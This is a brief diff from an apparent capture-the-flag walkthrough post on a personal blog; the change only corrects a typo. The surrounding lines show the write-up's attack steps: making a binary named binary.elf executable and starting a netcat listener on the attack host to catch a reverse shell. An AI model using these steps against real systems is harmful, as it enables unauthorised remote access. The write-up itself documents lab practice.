ChristElise/christelise.github.io/_posts/2024-10-16-airplane-walkthrough.md

 └─$ chmod 755 binary.elf
 ```

-With the palyload set we can start a listener on our attack host.
+With the payload set, we can start a listener on our attack host.
 ```bash
 ┌──(pentester㉿kali)-[~/…/Challenge/Airplane/Scans/Web]
 └─$ nc -lvnp 1234